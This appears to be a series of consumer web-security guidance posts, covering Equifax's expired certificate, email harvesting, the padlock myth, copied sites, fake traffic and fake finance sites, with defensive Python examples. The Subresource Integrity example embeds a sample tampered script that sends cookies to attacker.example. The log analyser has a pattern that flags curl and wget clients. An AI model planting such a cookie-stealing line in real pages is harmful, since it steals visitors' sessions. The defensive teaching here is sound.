Category: Guidance

How Accidental Data Leaks Happen

It’s easy to assume that all data breaches are the result of criminal activity, but that’s far from true.

A study of data from 2016/17 found that 92% of security incidents and 84% of confirmed data breaches were the result of accidents or mistakes rather than deliberate attacks.

Here are the most common problems leading to leaks of data:

1. Expired Security Certificates

Security certificates are an essential component of protecting systems, and Equifax found that out the hard way in 2017. The attackers got in through a known, unpatched vulnerability in the Apache Struts framework on one of Equifax’s public web servers. The expired certificate was on the device that inspected the company’s encrypted network traffic: because it had lapsed, encrypted traffic was no longer being decrypted and examined, so the intruders’ activity and the data they were sending out went unnoticed for more than two months. Around 143 million people’s records were exposed, containing names, addresses, dates of birth, Social Security numbers and driver licence numbers (Equifax later revised the total upwards).

So the expired certificate did not open the door, but it blinded the monitoring that should have spotted the intruders once they were inside. If the certificate had been renewed when it should have been, the break-in could have been detected and stopped far sooner, and far less data would have been taken.
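The practical lesson is that certificate expiry has to be monitored, not remembered. The following is an added example (not code from the original post or from Equifax) of a small expiry check in Python: it takes certificates in the dictionary shape that Python’s ssl module returns from getpeercert(), works out how many days remain, and classifies each host as OK, EXPIRING or EXPIRED. The sample inventory, the host names and the 30-day warning threshold are constructed for the example; live_status() shows how the same check would be run against a real host over the network.

```python
import socket
import ssl
from datetime import datetime, timezone

WARN_DAYS = 30  # assumption: raise a warning when fewer than 30 days remain

# Constructed sample inventory in the dict shape that ssl.SSLSocket.getpeercert()
# returns (only the field this check needs). Dates are relative to CHECK_TIME.
CHECK_TIME = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_CERTS = {
    "www.example.com":     {"notAfter": "Dec 31 23:59:59 2025 GMT"},  # plenty of time
    "api.example.com":     {"notAfter": "Jun 15 00:00:00 2024 GMT"},  # 14 days left
    "inspect.example.com": {"notAfter": "Mar  1 00:00:00 2024 GMT"},  # already expired
}


def days_until_expiry(cert, now):
    """Whole days until the certificate's notAfter; negative once it has expired."""
    not_after = datetime.fromtimestamp(ssl.cert_time_to_seconds(cert["notAfter"]), timezone.utc)
    return (not_after - now).days


def classify(cert, now, warn_days=WARN_DAYS):
    days = days_until_expiry(cert, now)
    if days < 0:
        return "EXPIRED"
    if days < warn_days:
        return "EXPIRING"
    return "OK"


def audit(certs, now):
    """Map each host to its status so the result can feed a monitoring alert."""
    return {host: classify(cert, now) for host, cert in certs.items()}


def live_status(host, port=443, timeout=5.0):
    """Network version: fetch the certificate a host presents and classify it.
    Default verification rejects an expired (or otherwise invalid) chain, and that
    failure is reported rather than hidden: a monitor should page on it too."""
    ctx = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return classify(tls.getpeercert(), datetime.now(timezone.utc))
    except ssl.SSLCertVerificationError as exc:
        return f"VERIFY_FAILED: {exc.reason}"


if __name__ == "__main__":
    for host, status in audit(SAMPLE_CERTS, CHECK_TIME).items():
        print(f"{host:22} {status}")
```

Run it on a schedule against every certificate you own, including the ones on internal appliances such as traffic-inspection boxes, which are exactly the ones nobody looks at in a browser.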

2. Unsecured Third Party Vendors

Many websites and complex systems are a mix of the owner’s own software plus a variety of third party plugins, add-ons and linked external services, and each of those runs with the same trust as your own code. As in any other part of life, the weakest link determines the safety level of the whole system: if the third parties aren’t adequately secured then the whole system becomes vulnerable, however careful you have been with your own part.
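For the “linked external services” case there is one concrete control worth knowing: Subresource Integrity (SRI), where the page records a hash of the third party script it expects, and the browser refuses to run the script if what the third party serves no longer matches. The following is an added example, not code from the original post or from any vendor it mentions, that generates the integrity value and shows the check the browser performs. The script contents, the CDN address and the tampered copy are constructed for the example.

```python
import base64
import hashlib
import hmac

# Constructed stand-in for a third-party script you embed, and a copy that has
# been tampered with on the third party's side (it now steals the cookie).
PUBLISHED = b"window.widget = function () { return 'ok'; };\n"
TAMPERED = PUBLISHED + b"fetch('https://attacker.example/?c=' + document.cookie);\n"


def sri_hash(content, algo="sha384"):
    """Build the value for the integrity attribute: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src, content):
    """Emit the tag to put in your page. crossorigin is required for SRI to apply
    to a script loaded from another origin."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def sri_matches(content, integrity):
    """What the browser does before executing: recompute and compare.
    Accepts a space-separated list of hashes; any one matching is enough."""
    for token in integrity.split():
        algo, _, b64 = token.partition("-")
        if algo not in ("sha256", "sha384", "sha512"):
            continue  # unknown algorithms are ignored, as browsers do
        expected = base64.b64decode(b64)
        if hmac.compare_digest(hashlib.new(algo, content).digest(), expected):
            return True
    return False


if __name__ == "__main__":
    tag = script_tag("https://cdn.example/widget.js", PUBLISHED)
    print(tag)
    print("published copy runs:", sri_matches(PUBLISHED, sri_hash(PUBLISHED)))
    print("tampered copy runs: ", sri_matches(TAMPERED, sri_hash(PUBLISHED)))
```

The price of SRI is that you must update the hash whenever the third party legitimately changes the script, so pin a versioned URL rather than a “latest” one. It does nothing for what the script itself loads afterwards, or for server-side plugins, which need their own patching and review.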

3. Poor Email Security

Most hackers still gain access through phishing, that is, sending out emails designed to get people to respond in some way that hands over the information the hackers need to access systems. Maybe it’s a fake quiz that asks for a login and password, or an offer of a gift token, and so on.

Or it could simply be that people haven’t learned to use passwords that are unguessable, not to reuse them between systems, and not to write them down by their desk.

Nightfall, a company that protects systems and data, has written the following article explaining in more detail how accidental data leaks happen: https://nightfall.ai/resources/accidental-data-leaks/

If you have any experiences with these scams do let me know, by email.

Fightback Ninja Signature

Protect Email Addresses on Websites

To build up lists of email addresses that can be sold to spammers and scammers, the people who collect them run software that scans websites looking for email addresses.

This is called email harvesting and is done on a huge scale.

The hackers typically scan websites, mailing lists, internet forums, social media platforms and anywhere else they can find email addresses online.

The characteristic format for an email address is name@domain.com, so it is simple for email harvesters to read web pages and look for the @ symbol, as it seldom occurs anywhere on a web page except in an email address.

The harvesters can also check for unusual variations on that theme e.g. User[at]domain.com or User[AT]domain[DOT]com

How to Protect Email Addresses

There are a series of steps you can take to protect any email addresses on your website from being harvested. These range from the simple to seriously complex and which method you should use depends on how much of a problem you have with harvesting.

Method 1 – Replace the email address with a picture showing the email address. Harvesters that only read text will miss it, but so will screen readers, and visitors have to type the address by hand, so this is a blunt tool.

Method 2 – Separate the Email Address From the Website

The email address never appears in the page itself; for example, the link points at a small script on your own server which redirects to the mailto: address, so there is nothing on the page for a harvester to read.

Method 3 – Mask the Email Address

This can be done with HTML character entities, e.g. writing &#64; in place of the @ sign; the browser still shows an @ to the visitor.

All characters can be encoded in this manner, which hides the address from a harvester that searches the raw page source for an @ sign. It does not stop a harvester that decodes the entities before searching, and many now do, so treat this as a speed bump rather than a barrier.

Method 4 – Use Javascript

The address can be divided into several parts that are joined together by the browser when the page is displayed, so the complete address never appears in the page source. This defeats harvesters that do not run JavaScript, which is still most of them, but not one that loads the page in a real browser.
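To see what methods 3 and 4 actually achieve, it helps to play the harvester. The following is an added example (not code from the original post) in Python: a simple harvester of the kind described above, which looks for name@domain and the [at]/[dot] variants, run against a constructed page that carries one address per method. A flag models the smarter harvester that decodes HTML entities before searching. The page, the addresses and the helper names are all constructed for the example.

```python
import html
import re

# A harvester of the kind described in the post (constructed for this example):
# name@domain, or "name [at] domain [dot] com" style variants, in the raw page text.
HARVEST_RE = re.compile(
    r"[\w.+-]+\s*(?:@|[\[(]\s*at\s*[\])])\s*[\w-]+(?:\s*(?:\.|[\[(]\s*dot\s*[\])])\s*[\w-]+)+",
    re.IGNORECASE,
)


def normalise(raw):
    """Turn 'sales [at] example [dot] com' into sales@example.com."""
    s = re.sub(r"\s*[\[(]\s*at\s*[\])]\s*", "@", raw, flags=re.IGNORECASE)
    s = re.sub(r"\s*[\[(]\s*dot\s*[\])]\s*", ".", s, flags=re.IGNORECASE)
    return re.sub(r"\s+", "", s).lower()


def harvest(page, decode_entities=False):
    """Addresses a harvester would collect from the page source.
    decode_entities=True models a harvester that un-escapes HTML first."""
    if decode_entities:
        page = html.unescape(page)
    return [normalise(m.group(0)) for m in HARVEST_RE.finditer(page)]


def entity_encode(addr):
    """Method 3: every character as a numeric HTML entity (renders normally)."""
    return "".join(f"&#{ord(c)};" for c in addr)


def js_split(addr):
    """Method 4: user and domain kept apart and joined by the browser.
    Note there is no '@' anywhere in the emitted source (char code 64 instead)."""
    user, domain = addr.split("@", 1)
    return (
        "<script>"
        f"var u='{user}',d='{domain}',a=u+String.fromCharCode(64)+d;"
        "document.write('<a href=\"mailto:'+a+'\">'+a+'</a>');"
        "</script>"
    )


# Constructed page carrying one address per method.
PAGE = f"""
<p>Plain: info@example.com</p>
<p>Spaced: sales [at] example [dot] com</p>
<p>Entities: {entity_encode("press@example.com")}</p>
<p>Script: {js_split("jobs@example.com")}</p>
"""

if __name__ == "__main__":
    print("naive harvester:    ", harvest(PAGE))
    print("entity-aware one:   ", harvest(PAGE, decode_entities=True))
```

The spaced-out address is caught by the naive harvester, the entity-encoded one falls only to the entity-aware harvester, and the JavaScript-assembled one is missed by both because the page source never contains an @ at all. A harvester driving a real browser would still get that last one, which is why a contact form or CAPTCHA-gated reveal is the stronger option if harvesting is a serious problem for you.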

Method 5 – Use a Captcha

A CAPTCHA is a type of challenge–response test you can add to a web page to check that it is being read by a person, not by software; the email address is only revealed once the challenge has been passed.

These have become very common on many websites, so most people are used to them now.

Method 6 – Use a Contact Form

Instead of posting an email address on a web page, create a contact form. This can capture more information in a structured manner from the user and keeps the email address in a separate server-side script that visitors never see. The form itself still needs spam protection (a CAPTCHA or similar), or it simply becomes the new target.


The Secure Padlock Myth

When browsing on the Internet, you will be familiar with the padlock symbol that appears just to the left of the internet address. Depending on your browser, the padlock symbol may be green.

That padlock means ‘secure’ and you should never input any confidential information on a website if there isn’t a padlock symbol showing.

However, this does not mean that the website is safe to use, only that the connection between your browser and the website’s address is encrypted. The encryption is called TLS (the successor to SSL, though most people still call it SSL).

The little padlock does not mean that the website is safe, as criminals can get a certificate for a fake scam website free of charge within minutes, and most scam sites now have one.

Google has since removed the padlock from Chrome (it was replaced by a “tune” icon), precisely because the vast majority of websites now use TLS and the padlock was being read as a sign of trustworthiness it never guaranteed.

If you want more detail, you can click on the padlock (or the icon that replaced it) and view the certificate. It will tell you which domain name the certificate was issued for. For most sites, scam sites included, that is all it will say, because the free certificates are domain-validated and name no organisation; only some business and banking sites use certificates that also carry the company’s name. So the thing to check is the domain name itself, letter by letter, against the address you expected: a name that is nearly but not quite right is the red warning flag.
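To make concrete what the padlock does and does not verify, here is an added example (not code from the original post) in Python that inspects two constructed certificates in the dictionary shape Python’s ssl module returns from getpeercert(): one for a bank that carries an organisation name, and one free domain-validated certificate for a lookalike scam domain. Both “match their host”, which is all the padlock ever checks; only the certificate’s contents tell you whether anyone vouched for the organisation behind it. The domain names and company name are invented for the example.

```python
# Constructed certificates in the shape returned by ssl.SSLSocket.getpeercert().
BANK_CERT = {
    "subject": ((("countryName", "GB"),),
                (("organizationName", "Example Bank plc"),),
                (("commonName", "www.examplebank.example"),)),
    "subjectAltName": (("DNS", "www.examplebank.example"),
                       ("DNS", "examplebank.example")),
}
SCAM_CERT = {  # a free domain-validated certificate: no organisation at all
    "subject": ((("commonName", "examplebank-login.example"),),),
    "subjectAltName": (("DNS", "examplebank-login.example"),
                       ("DNS", "*.examplebank-login.example")),
}


def san_dns_names(cert):
    """DNS names the certificate is valid for (browsers ignore commonName now)."""
    return [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]


def subject_field(cert, field):
    """Pull one attribute (e.g. organizationName) out of the nested subject tuples."""
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == field:
                return value
    return None


def dns_name_matches(pattern, hostname):
    """Exact match, or a '*.' wildcard that covers exactly one label."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern.startswith("*."):
        if "." not in hostname:
            return False
        return hostname.split(".", 1)[1] == pattern[2:]
    return pattern == hostname


def describe(cert, hostname):
    """What the padlock proves (host_matches) versus what it does not (organisation)."""
    org = subject_field(cert, "organizationName")
    return {
        "host_matches": any(dns_name_matches(n, hostname) for n in san_dns_names(cert)),
        "organisation": org,
        "validation": "OV/EV: organisation named" if org else "DV: domain name only",
    }


if __name__ == "__main__":
    print(describe(BANK_CERT, "www.examplebank.example"))
    print(describe(SCAM_CERT, "examplebank-login.example"))
```

Both lines print host_matches True, so both sites get a padlock; the difference is entirely in the organisation field, and for the scam site the only thing you can check is the domain name you typed or were sent.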


What to Do When Your Website is Copied

As many of us know, building a website with great content that attracts customers and serves their needs is a long, tough job, but it is an essential part of most businesses nowadays.

Unfortunately, there are many out there who may decide to use that success to their own advantage by simply copying graphics, content and ideas from your website, or even duplicating your whole website and putting their name on it.

What Can You Do?

If your site is copied, the first step is to collect evidence: take dated screenshots of both your site and the copy, save the copied pages, and then try to contact the owner of the copycat site.

If the copying is not too serious, then maybe a warning will lead to removal of the problem content.

But in some cases, the copying is part of a very deliberate plan to defraud people and you may get the blame from scammed customers.
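Screenshots show that copying happened; a measurement of how much was copied is useful evidence too, and it is how you would scan for copies in the first place. The following is an added example (not code from the original post) in Python: it extracts the visible text from two HTML pages, breaks each into runs of five consecutive words (“shingles”), and reports what fraction of the original’s runs reappear in the suspect page. Changing the company name and a few details, as copycats do, barely moves the score. The three sample pages are constructed for the example.

```python
import re
from html.parser import HTMLParser


class _VisibleText(HTMLParser):
    """Collect the text a visitor would read, skipping script and style blocks."""

    def __init__(self):
        super().__init__()
        self.parts, self._skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def visible_words(doc):
    parser = _VisibleText()
    parser.feed(doc)
    parser.close()
    return re.findall(r"[a-z0-9']+", " ".join(parser.parts).lower())


def shingles(words, k=5):
    """Every run of k consecutive words; k=5 is long enough that chance overlap is rare."""
    return {tuple(words[i:i + k]) for i in range(len(words) - k + 1)}


def copied_fraction(original, suspect, k=5):
    """Share of the original's word runs that reappear in the suspect page (0.0 to 1.0)."""
    a, b = shingles(visible_words(original), k), shingles(visible_words(suspect), k)
    return len(a & b) / len(a) if a else 0.0


# Constructed sample pages: your site, a copycat with the names changed, and an unrelated site.
ORIGINAL = """<html><head><title>Acme Widgets</title><style>p {color: red}</style></head>
<body><h1>Acme Widgets</h1><script>track('pageview');</script>
<p>We design and build hand finished oak widgets in our Devon workshop and every order
is made to measure, tested twice and delivered free to any address in the United
Kingdom within ten working days.</p></body></html>"""
COPY = ORIGINAL.replace("Acme", "Zenith").replace("Devon", "Kent")
UNRELATED = """<html><body><p>Our accountancy practice prepares annual returns and tax
computations for sole traders and small partnerships across the north west.</p></body></html>"""

if __name__ == "__main__":
    print(f"copycat:   {copied_fraction(ORIGINAL, COPY):.0%} of our text reused")
    print(f"unrelated: {copied_fraction(ORIGINAL, UNRELATED):.0%} of our text reused")
```

A figure like “77% of our page text appears verbatim on theirs” is far more persuasive in a takedown notice than “they copied us”, and the same function can be pointed at any page a search for your own distinctive sentences turns up.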

Steps to Take

  1. Use a WHOIS lookup service (e.g. whois.com) to find out who registered the copycat site’s domain name.

The record may include a contact email address.

Since 2018, however, most registrars redact personal details, so often all you will see is the name of the registrar and its abuse contact address, which is still a useful place to send a complaint.

  2. Contact the company hosting the website.

A WHOIS lookup on the site’s IP address (rather than its name) shows which hosting provider owns that address. You can ask the host to take the page or site down, but you will need your evidence, of course.

  3. Search engines

If you are ignored by the site owner, you can submit copyright removal requests to Google and Bing to have the copied pages removed from their listings.

  4. DMCA takedown

If you need the copied site taken down entirely, send a DMCA takedown notice, a formal copyright complaint, to the host (or the search engine). Writing and sending one yourself costs nothing; commercial takedown services charge for doing it for you (around $199 per site at the time of writing), which can be worth it if you have many copies to chase.

  5. Seek legal advice.

If you do not succeed, then it’s time to get legal advice and go after the owner of the website for damages.

This can be time consuming and expensive so it depends on the level of damage the copycat web site is causing to your business / reputation.

If you have any experiences with this issue of websites being copied,  do let me know, by email.


Does Your Website Attract Fake Traffic

Website owners are always keen to know how much “traffic” their site gets i.e. how many people visit the site, which pages they read etc.

We all know that some of the traffic on the Internet is fake, but most website owners hope it is a small percentage of the real traffic.  However, some companies in the field of advertising believe that up to 50% of traffic achieved through advertising could be fake.

In this context ‘fake’ means it’s not a person looking at your website but another computer, a program requesting the pages.

This is one reason why so many websites these days insist you answer a CAPTCHA query (click the “I’m not a robot” button) to prove you are a human being.

Fake traffic is traffic generated by software not by humans. Fake traffic is used to artificially inflate ad revenue by making a site’s audience appear greater than it is in reality.

If an advertising network identifies a website’s traffic as fake, it will likely result in suspensions or even bans on the publisher’s advertising account.

How To Identify Fake Traffic

This is a complicated matter and needs expertise, but you would start by examining the statistics for the website:

  • A very high bounce rate can indicate a lot of disinterested visitors or bots (computer programs rather than people).
  • A very low pages-per-session figure can mean people attracted to the site are only interested in one link and then leave. Combined with a very short average length of visit, it can mean automated viewing rather than people.
  • Geography: if your website is in English and you get large amounts of traffic from countries where English is not typically used much, that can indicate suspect traffic.
  • A sudden unexplained increase in traffic can be welcome, but if it doesn’t make sense, e.g. no extra purchases or comments, then it may be caused by automated systems scanning your website.

How to Stop Bots Accessing Your Website

Using a CAPTCHA to check that visitors are human rather than software is a good start. There is also a file on your website called robots.txt which tells bots which parts of the site they may and may not visit (check on the Internet for how to access and edit this file on your hosting platform). Bear in mind that robots.txt is a request, not a lock: reputable business bots will read it and obey its instructions, but scammers, spammers, hackers and many others will ignore it, so anything genuinely private must be protected by a login or access control, not just listed in robots.txt.
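The statistics above and the robots.txt point can both be checked directly from your web server’s access log. The following is an added example (not code from the original post) in Python that parses log lines in the common Apache/nginx “combined” format, groups them by client address, and flags a visitor that fetched robots.txt and then requested paths it disallows, that fired a burst of requests faster than a person can click, or that announced itself with a scripting tool’s user agent. The log lines, the robots.txt and the thresholds (5 requests within 10 seconds) are constructed for the example; a polite crawler and an ordinary visitor are included to show they are not flagged.

```python
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referrer>[^"]*)" "(?P<ua>[^"]*)"'
)
SCRIPTED_UA = re.compile(r"python-requests|curl/|wget/|go-http-client|libwww", re.IGNORECASE)

# Constructed robots.txt and access log: a human visitor, a polite crawler that obeys
# robots.txt, and a scraper that reads robots.txt and then does the opposite.
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /private/
"""
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/118.0"
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /products HTTP/1.1" 200 8200 "https://shop.example/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/118.0"
198.51.100.7 - - [10/Oct/2023:13:57:42 +0000] "GET /contact HTTP/1.1" 200 3100 "https://shop.example/products" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/118.0"
192.0.2.10 - - [10/Oct/2023:14:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 120 "-" "ExampleBot/1.0 (+https://example.org/bot)"
192.0.2.10 - - [10/Oct/2023:14:00:31 +0000] "GET / HTTP/1.1" 200 5120 "-" "ExampleBot/1.0 (+https://example.org/bot)"
192.0.2.10 - - [10/Oct/2023:14:01:05 +0000] "GET /products HTTP/1.1" 200 8200 "-" "ExampleBot/1.0 (+https://example.org/bot)"
203.0.113.5 - - [10/Oct/2023:14:10:00 +0000] "GET /robots.txt HTTP/1.1" 200 120 "-" "python-requests/2.31.0"
203.0.113.5 - - [10/Oct/2023:14:10:01 +0000] "GET /admin/ HTTP/1.1" 403 210 "-" "python-requests/2.31.0"
203.0.113.5 - - [10/Oct/2023:14:10:01 +0000] "GET /private/report.pdf HTTP/1.1" 403 210 "-" "python-requests/2.31.0"
203.0.113.5 - - [10/Oct/2023:14:10:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
203.0.113.5 - - [10/Oct/2023:14:10:03 +0000] "GET /products?page=2 HTTP/1.1" 200 8200 "-" "python-requests/2.31.0"
203.0.113.5 - - [10/Oct/2023:14:10:04 +0000] "GET /products?page=3 HTTP/1.1" 200 8200 "-" "python-requests/2.31.0"
"""


def disallowed_prefixes(robots_txt):
    """Disallow: paths in the 'User-agent: *' group (the only group used here)."""
    prefixes, applies = [], False
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            applies = value == "*"
        elif key == "disallow" and applies and value:
            prefixes.append(value)
    return prefixes


def parse_log(text):
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec


def analyse(log_text, robots_txt, burst_requests=5, burst_window=10):
    """Per-IP summary with the fake-traffic flags described in the post."""
    prefixes = disallowed_prefixes(robots_txt)
    by_ip = defaultdict(list)
    for rec in parse_log(log_text):
        by_ip[rec["ip"]].append(rec)
    report = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        span = (recs[-1]["time"] - recs[0]["time"]).total_seconds()
        paths = [r["path"].split("?", 1)[0] for r in recs]
        pages = {p for p in paths if p != "/robots.txt"}
        bad = sum(1 for p in paths if any(p.startswith(x) for x in prefixes))
        flags = []
        if bad:
            flags.append("ignores robots.txt")
        if len(recs) >= burst_requests and span <= burst_window:
            flags.append("burst")
        if SCRIPTED_UA.search(recs[0]["ua"]):
            flags.append("scripted client")
        report[ip] = {"requests": len(recs), "pages": len(pages), "span_seconds": span,
                      "disallowed_hits": bad, "user_agent": recs[0]["ua"], "flags": flags}
    return report


if __name__ == "__main__":
    for ip, summary in analyse(SAMPLE_LOG, ROBOTS_TXT).items():
        print(ip, summary["requests"], "requests,", summary["pages"], "pages,", summary["flags"])
```

None of these signals is proof on its own (a user agent is trivially faked, and a real visitor opening several tabs at once looks like a small burst), but an address that trips all three is a safe candidate for blocking or rate limiting, and the disallowed-path check is a cheap way to catch the bots that read robots.txt purely to learn where the interesting pages are.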

If the fake traffic problem is seriously impacting your website and customers, then there are online bot-management and web application firewall services that will filter out such unwanted traffic, but that does cost, of course.

All sites attract fake traffic and the more popular a site then typically the more fake traffic it will get.

If you have any experiences with this problem, do let me know, by email.


How to Check a Financial Web Site is Genuine

Imagine you want to find the best place for your savings or the best place to invest a windfall or the best pension scheme available, for example.

You might go to a professional financial advisor or to your bank or other finance organisation you know.

But if you don’t have the money for an advisor then it might be a case of asking friends and relatives for their opinions or just using a search engine.

However, when you start searching online, there is a huge number of finance organisations out there, and many criminals create fake websites that sometimes look exactly like the ones for genuine businesses.

Q. How do you tell which websites are genuine and which are fake?

The starting point is to ignore unsolicited emails, text messages, calls etc. – these are very likely to be fake and should be ignored.

Things to Look For

  1. Check the message and the website for mistakes
    • The web address spelled exactly right, e.g. Barclays rather than Baclays; check it letter by letter
    • Use of broken English
    • Simple spelling mistakes or serious grammatical errors
    • Content on the website that doesn’t make sense
    • Pictures, diagrams etc. that don’t fit in with the rest of the site and look as if they have been added at random to fill space

  2. Open the Google Transparency Report page at https://transparencyreport.google.com/safe-browsing/search?hl=en_GB, click the “Search by URL” field in the middle of the page and type in the Internet address of the website you want to check. Google will tell you if its Safe Browsing service has found anything dodgy about the website.

  3. Check the company on the Companies House website at https://www.gov.uk/get-information-about-a-company. A company registration only shows that the business exists, not that it is honest; for anything regulated (savings, investments, pensions), also check that the firm appears on the FCA’s Financial Services Register at https://register.fca.org.uk and that the contact details listed there match the website.
  4. Check for reviews online about the business and check anti-scam websites.
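The first check in the list, reading the web address letter by letter, is the one people get wrong most often, because “barclays.co.uk.secure-login.example” and “baclays.co.uk” both pass a casual glance. The following is an added example (not code from the original post) in Python that automates that check against a list of domains you know to be genuine: it extracts the registered domain from a URL, treats it as genuine only if it is exactly on the list, and flags addresses that bury a known name in a longer domain or sit within one or two characters of one. The domain list is an assumption (you would fill in the real domains you deal with); the handling of two-part UK suffixes such as .co.uk is deliberately simplified.

```python
from urllib.parse import urlsplit

# Assumption: your own list of the genuine domains you deal with, checked independently.
KNOWN_DOMAINS = {"examplebank.co.uk": "Example Bank", "examplesavings.com": "Example Savings"}
UK_SECOND_LEVEL = {"co", "org", "ac", "gov", "ltd", "plc", "me", "net"}


def split_host(url):
    """Return (registered domain, full host). Handles two-part UK suffixes only (assumption);
    a real tool would use the public suffix list."""
    if "://" not in url:
        url = "https://" + url
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    labels = host.split(".")
    if len(labels) >= 3 and labels[-1] == "uk" and labels[-2] in UK_SECOND_LEVEL:
        return ".".join(labels[-3:]), host
    return ".".join(labels[-2:]), host


def levenshtein(a, b):
    """Edit distance: how many single-character changes turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_url(url, max_distance=2):
    """('genuine' | 'suspicious' | 'unknown', registered domain, reason)."""
    reg, host = split_host(url)
    if reg in KNOWN_DOMAINS:
        return ("genuine", reg, KNOWN_DOMAINS[reg])
    own = reg.split(".")[0]
    for domain, brand in KNOWN_DOMAINS.items():
        label = domain.split(".")[0]
        if label in host:  # known name buried in a subdomain or a longer name
            return ("suspicious", reg, f"uses the name '{label}' but is not {domain}")
        if levenshtein(own, label) <= max_distance:  # typo-squat such as Baclays
            return ("suspicious", reg, f"within {max_distance} characters of {domain}")
    return ("unknown", reg, "not on the list: verify it independently")


if __name__ == "__main__":
    for candidate in ("https://www.examplebank.co.uk/login",
                      "https://examplebank.co.uk.secure-login.example/",
                      "exanplebank.co.uk",
                      "https://www.bbc.co.uk/news"):
        print(f"{candidate:50} {check_url(candidate)}")
```

Note that the only address rated genuine is the one whose registered domain is exactly on your list; everything else is either suspicious or simply unknown, which is the right default for a site that wants your money. Lookalikes built from non-Latin characters that resemble Latin ones are not caught by an edit-distance check and are a further reason to type the address yourself rather than follow a link.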
